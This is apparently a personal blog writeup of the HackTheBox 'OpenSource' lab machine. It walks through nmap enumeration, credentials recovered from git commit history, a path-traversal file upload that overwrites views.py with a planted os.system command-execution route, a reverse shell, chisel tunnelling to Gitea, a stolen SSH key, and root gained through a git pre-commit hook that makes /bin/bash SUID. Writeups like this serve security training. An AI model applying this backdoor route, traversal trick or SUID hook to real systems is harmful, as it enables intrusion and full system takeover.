🐧 OpenSource

Sun Aug 7, 2022

Machine Hackthebox Linux Easy Web Flask Git Gitea File Upload Password Reuse Code Analysis Docker Python Pivot Scheduled Job Abuse Directory Traversal

This is my writeup for the OpenSource machine on the Hackthebox plateform.

Let’s start with an nmap scan to enumerate the different ports that are open.

Port 22 (SSH)
Port 80 (HTTP)
Port 3000 (Filtered)

nmap -sC -sV -oA nmap/opensource 10.10.11.164

# Nmap 7.92 scan initiated Mon Jul 25 21:20:40 2022 as: nmap -sC -sV -oA nmap/opensource 10.10.11.164
Nmap scan report for 10.10.11.164
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
|   256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_  256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp   open     http    Werkzeug/2.1.2 Python/3.10.3
|_http-title: upcloud - Upload files for Free!
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Mon, 25 Jul 2022 19:21:22 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5316
|     Connection: close
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>upcloud - Upload files for Free!</title>
|     <script src="/static/vendor/jquery/jquery-3.4.1.min.js"></script>
|     <script src="/static/vendor/popper/popper.min.js"></script>
|     <script src="/static/vendor/bootstrap/js/bootstrap.min.js"></script>
|     <script src="/static/js/ie10-viewport-bug-workaround.js"></script>
|     <link rel="stylesheet" href="/static/vendor/bootstrap/css/bootstrap.css"/>
|     <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-grid.css"/>
|     <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-reboot.css"/>
|     <link rel=
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Mon, 25 Jul 2022 19:21:22 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, GET, OPTIONS
|     Content-Length: 0
|     Connection: close
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
	|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
3000/tcp filtered ppp

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Website

On the main page, there is a link to download upcloud, a web application accessible via the endpoint /upcloud. It can be downloaded and analyzed for vulnerabilities.

Download

The archive is a Github repository (contains the .git folder), which allows to analyze the commits logs. Thus, we find identifiers that have been pushed in an old commit :

dev01:Soulless_Developer#2022

gitkraken

Analyzing the views.py file of the source code, we observe 2 routes :

**/** with the **GET and POST** method
**/uploads/<path:path\>**

views

The get_file_name() function will recursively replace occurrences of ../ with an empty string to avoid the path traversal vulnerability. The problem is that the os.path.join function will concat the different arguments except that if an argument is an absolute path, all previous components will be ignored : https://docs.python.org/3/library/os.path.html

Join

>>> os.path.join(os.getcwd(), "public", "uploads", "/app/app/views.py")
'/app/app/views.py'

We can then set the file name to ..//app/app/views.py, which will replace the original views.py file with our own, which contains an additional route that allows us to run code on the server.

@app.route('/QU35T-rce')
def go():
	key = request.args.get('supersecretparam')
	return os.system(key)

explain

burp

We can then execute code on the server and get a reverse shell !

rce

Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 172.17.0.1.
Ncat: Connection from 172.17.0.1:59328.
/bin/sh: cant access tty; job control turned off

/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(vide
o)

DOCKER

Nmap let us know that port 3000 is filtered. Chisel will allow us to forward the port in order to determine and operate the service.

# HOST

./chisel server -p 9004 -reverse

2022/08/07 10:44:36 server: Reverse tunnelling enabled
2022/08/07 10:44:36 server: Fingerprint FFy2pM8PDRpP4bcRZbtL5By48S62fqgAsa8qVp0yv9w=
2022/08/07 10:44:36 server: Listening on http://0.0.0.0:9004
2022/08/07 10:44:41 server: session#1: tun: proxy#R:9005=>172.17.0.1:3000: Listening

# DOCKER

./chisel client 10.10.14.144:9004 R:9005:172.17.0.1:3000

2022/08/07 10:44:28 client: Connecting to ws://10.10.14.144:9004
2022/08/07 10:44:42 client: Connected (Latency 78.439132ms)

The service is Gitea. Thanks to the credentials found via the commits logs, we can connect to the dev01 account : dev01:Soulless_Developer#2022

Gitea

The developer has a backup repository of his home where his SSH private key is located in the .ssh folder. We can retrieve it and use it to connect via SSH.

Repo

Privesc

ssh -i dev01.key dev01@10.10.11.164

Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-176-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Aug 7 10:48:47 UTC 2022
System load: 0.12 Processes: 246
Usage of /: 86.9% of 3.48GB Users logged in: 0
Memory usage: 41% IP address for eth0: 10.10.11.164
Swap usage: 0% IP address for docker0: 172.17.0.1
=> / is using 86.9% of 3.48GB
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
16 updates can be applied immediately.
9 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Aug 7 00:53:20 2022 from 10.10.16.33

The pspy tool allows you to know that every minute, the root executes the git add, git commit and git push commands in order to make a backup.

2022/08/07 10:51:01 CMD: UID=0 PID=17523 |
2022/08/07 10:51:01 CMD: UID=0 PID=17524 | git add .
2022/08/07 10:51:01 CMD: UID=0 PID=17525 | git commit -m Backup for 2022-08-07
2022/08/07 10:51:01 CMD: UID=0 PID=17527 | /usr/lib/git-core/git-remote-http origin http://opensource.htb:3000/dev01/home-backup.git
2022/08/07 10:51:01 CMD: UID=0 PID=17526 | git push origin main

We can then add a pre-commit hook, editing the permissions of the bash binary, so that it is triggered during the root commit.

dev01@opensource:~/.git/hooks$ cat pre-commit
chmod u+s /bin/bash

All you have to do is wait a minute for the root to commit and run bash -p to elevate his privileges.